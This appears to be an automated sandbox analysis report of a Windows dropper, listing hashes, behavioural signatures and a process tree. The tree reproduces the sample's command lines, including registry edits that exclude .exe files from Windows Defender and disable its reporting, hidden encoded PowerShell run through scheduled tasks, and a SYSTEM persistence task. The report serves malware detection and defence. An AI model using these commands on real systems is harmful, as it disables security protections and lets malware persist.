Analysis
-
max time kernel
143s -
max time network
112s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
23-11-2022 15:20
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20221111-en
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
d7772af55ad86fd7e0d80b329232d4a0
-
SHA1
91bd1a0568fe8f276fd60049412672cb349cd73b
-
SHA256
a30898a315160935891eaf5dc01eac7086e6a72e14dfb9f7be43835261f87290
-
SHA512
d2f4ec0885da71f43b2758d0b21266b53a30014e8d4775c3181d834ac3fb9f5b8acc6a0f549c52e4f40ecfadd1f5b6b70bdac6364492a68e007b6a4ccdbc2e71
-
SSDEEP
196608:91OaKOEjiU9l5UOA0yU/MmtNSM3f7LoVf/Ui2g6n:3Oa8Hl5tA0yTmW8Lt8G
Malware Config
Signatures
-
Executes dropped EXE 3 IoCs
Processes:
Install.exeInstall.exeotkstzt.exepid process 956 Install.exe 1012 Install.exe 1316 otkstzt.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
Install.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Loads dropped DLL 8 IoCs
Processes:
file.exeInstall.exeInstall.exepid process 1336 file.exe 956 Install.exe 956 Install.exe 956 Install.exe 956 Install.exe 1012 Install.exe 1012 Install.exe 1012 Install.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEotkstzt.exeInstall.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol otkstzt.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini otkstzt.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Drops file in Windows directory 1 IoCs
Processes:
schtasks.exedescription ioc process File created C:\Windows\Tasks\bPisEBnRwoxYOmuHrm.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 820 schtasks.exe 800 schtasks.exe 1596 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
Install.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.EXEpid process 2012 powershell.EXE 2012 powershell.EXE 2012 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.EXEdescription pid process Token: SeDebugPrivilege 2012 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
file.exeInstall.exeInstall.exeforfiles.exeforfiles.execmd.execmd.exedescription pid process target process PID 1336 wrote to memory of 956 1336 file.exe Install.exe PID 1336 wrote to memory of 956 1336 file.exe Install.exe PID 1336 wrote to memory of 956 1336 file.exe Install.exe PID 1336 wrote to memory of 956 1336 file.exe Install.exe PID 1336 wrote to memory of 956 1336 file.exe Install.exe PID 1336 wrote to memory of 956 1336 file.exe Install.exe PID 1336 wrote to memory of 956 1336 file.exe Install.exe PID 956 wrote to memory of 1012 956 Install.exe Install.exe PID 956 wrote to memory of 1012 956 Install.exe Install.exe PID 956 wrote to memory of 1012 956 Install.exe Install.exe PID 956 wrote to memory of 1012 956 Install.exe Install.exe PID 956 wrote to memory of 1012 956 Install.exe Install.exe PID 956 wrote to memory of 1012 956 Install.exe Install.exe PID 956 wrote to memory of 1012 956 Install.exe Install.exe PID 1012 wrote to memory of 1092 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1092 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1092 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1092 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1092 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1092 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1092 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1560 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1560 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1560 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1560 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1560 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1560 1012 Install.exe forfiles.exe PID 1012 wrote to memory of 1560 1012 Install.exe forfiles.exe PID 1092 wrote to memory of 1848 1092 forfiles.exe cmd.exe PID 1092 wrote to memory of 1848 1092 forfiles.exe cmd.exe PID 1092 wrote to memory of 1848 1092 forfiles.exe cmd.exe PID 1092 wrote to memory of 1848 1092 forfiles.exe cmd.exe PID 1092 wrote to memory of 1848 1092 forfiles.exe cmd.exe PID 1092 wrote to memory of 1848 1092 forfiles.exe cmd.exe PID 1092 wrote to memory of 1848 1092 forfiles.exe cmd.exe PID 1560 wrote to memory of 396 1560 forfiles.exe cmd.exe PID 1560 wrote to memory of 396 1560 forfiles.exe cmd.exe PID 1560 wrote to memory of 396 1560 forfiles.exe cmd.exe PID 1560 wrote to memory of 396 1560 forfiles.exe cmd.exe PID 1560 wrote to memory of 396 1560 forfiles.exe cmd.exe PID 1560 wrote to memory of 396 1560 forfiles.exe cmd.exe PID 1560 wrote to memory of 396 1560 forfiles.exe cmd.exe PID 1848 wrote to memory of 1244 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1244 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1244 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1244 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1244 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1244 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1244 1848 cmd.exe reg.exe PID 396 wrote to memory of 1628 396 cmd.exe reg.exe PID 396 wrote to memory of 1628 396 cmd.exe reg.exe PID 396 wrote to memory of 1628 396 cmd.exe reg.exe PID 396 wrote to memory of 1628 396 cmd.exe reg.exe PID 396 wrote to memory of 1628 396 cmd.exe reg.exe PID 396 wrote to memory of 1628 396 cmd.exe reg.exe PID 396 wrote to memory of 1628 396 cmd.exe reg.exe PID 1848 wrote to memory of 1752 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1752 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1752 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1752 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1752 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1752 1848 cmd.exe reg.exe PID 1848 wrote to memory of 1752 1848 cmd.exe reg.exe PID 396 wrote to memory of 1636 396 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1336 -
C:\Users\Admin\AppData\Local\Temp\7zSA120.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:956 -
C:\Users\Admin\AppData\Local\Temp\7zSA7A6.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1092 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1244
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1752
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:396 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1628
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1636
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gupADNOOs" /SC once /ST 05:19:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:820
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gupADNOOs"4⤵PID:964
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gupADNOOs"4⤵PID:1384
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bPisEBnRwoxYOmuHrm" /SC once /ST 16:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\otkstzt.exe\" mF /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:800
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {04173395-3184-465B-8FCD-D76FF3C8F143} S-1-5-21-575491160-2295418218-1540667289-1000:VZODHOJJ\Admin:Interactive:[1]1⤵PID:1768
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2012 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2024
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2040
-
C:\Windows\system32\taskeng.exetaskeng.exe {ED8EFF79-E7EB-4008-8A7F-CEFBCCFB670F} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:376
-
C:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\otkstzt.exeC:\Users\Admin\AppData\Local\Temp\QkBHKKzSXSgsEdMAS\olQmHhqFMBXnALo\otkstzt.exe mF /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1316 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gQMURnDWs" /SC once /ST 09:30:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1596
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.3MB
MD574dc860256858b61c0170b9af62c3a83
SHA18d499018f6467a2f7c4f78ea9915e3774f640fbd
SHA256330eb0a24c02d4dcee908a2c3274b113427e40d792f2bca729b54a9ea5c48f8a
SHA51256cc2aef2db9f3e1140a28cf33bddbb2e5d3fc5ea014b39caac42d703e884477b7f4fd5469fa72221e7ec951d5f9a4af5698ddb79bcb9b460553d9c4b4cbd625
-
Filesize
6.3MB
MD574dc860256858b61c0170b9af62c3a83
SHA18d499018f6467a2f7c4f78ea9915e3774f640fbd
SHA256330eb0a24c02d4dcee908a2c3274b113427e40d792f2bca729b54a9ea5c48f8a
SHA51256cc2aef2db9f3e1140a28cf33bddbb2e5d3fc5ea014b39caac42d703e884477b7f4fd5469fa72221e7ec951d5f9a4af5698ddb79bcb9b460553d9c4b4cbd625
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732
-
Filesize
6.3MB
MD574dc860256858b61c0170b9af62c3a83
SHA18d499018f6467a2f7c4f78ea9915e3774f640fbd
SHA256330eb0a24c02d4dcee908a2c3274b113427e40d792f2bca729b54a9ea5c48f8a
SHA51256cc2aef2db9f3e1140a28cf33bddbb2e5d3fc5ea014b39caac42d703e884477b7f4fd5469fa72221e7ec951d5f9a4af5698ddb79bcb9b460553d9c4b4cbd625
-
Filesize
6.3MB
MD574dc860256858b61c0170b9af62c3a83
SHA18d499018f6467a2f7c4f78ea9915e3774f640fbd
SHA256330eb0a24c02d4dcee908a2c3274b113427e40d792f2bca729b54a9ea5c48f8a
SHA51256cc2aef2db9f3e1140a28cf33bddbb2e5d3fc5ea014b39caac42d703e884477b7f4fd5469fa72221e7ec951d5f9a4af5698ddb79bcb9b460553d9c4b4cbd625
-
Filesize
6.3MB
MD574dc860256858b61c0170b9af62c3a83
SHA18d499018f6467a2f7c4f78ea9915e3774f640fbd
SHA256330eb0a24c02d4dcee908a2c3274b113427e40d792f2bca729b54a9ea5c48f8a
SHA51256cc2aef2db9f3e1140a28cf33bddbb2e5d3fc5ea014b39caac42d703e884477b7f4fd5469fa72221e7ec951d5f9a4af5698ddb79bcb9b460553d9c4b4cbd625
-
Filesize
6.3MB
MD574dc860256858b61c0170b9af62c3a83
SHA18d499018f6467a2f7c4f78ea9915e3774f640fbd
SHA256330eb0a24c02d4dcee908a2c3274b113427e40d792f2bca729b54a9ea5c48f8a
SHA51256cc2aef2db9f3e1140a28cf33bddbb2e5d3fc5ea014b39caac42d703e884477b7f4fd5469fa72221e7ec951d5f9a4af5698ddb79bcb9b460553d9c4b4cbd625
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
-
Filesize
6.8MB
MD5a37dbf6bceec57a1792cefc8691b4930
SHA197a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
SHA256edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
SHA512b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77